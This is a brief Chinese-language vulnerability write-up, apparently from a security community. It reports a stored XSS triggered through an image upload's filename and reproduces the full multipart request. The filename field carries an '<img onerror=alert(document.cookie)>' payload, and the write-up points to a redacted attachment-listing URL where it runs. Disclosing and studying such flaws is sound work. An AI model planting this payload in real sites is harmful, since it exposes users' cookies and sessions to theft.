文件名存储XSS
存储XSS,文件名为过滤导致的。
------WebKitFormBoundarylsTolBO3cLYwqwEU
Content-Disposition: form-data; name="upload_file[]"; filename="<img src=1 onerror=alert(document.cookie)>.jpg"
Content-Type: image/jpeg
0000000
------WebKitFormBoundarylsTolBO3cLYwqwEU
Content-Disposition: form-data; name="media_type"
image
------WebKitFormBoundarylsTolBO3cLYwqwEU
Content-Disposition: form-data; name="callback"
top.GM.upload.finishCallback
------WebKitFormBoundarylsTolBO3cLYwqwEU--
上传完,浏览:https://www.xxx.com/v1/attachment/list/get?media_t...
本文迁移自知识星球“火线Zone”
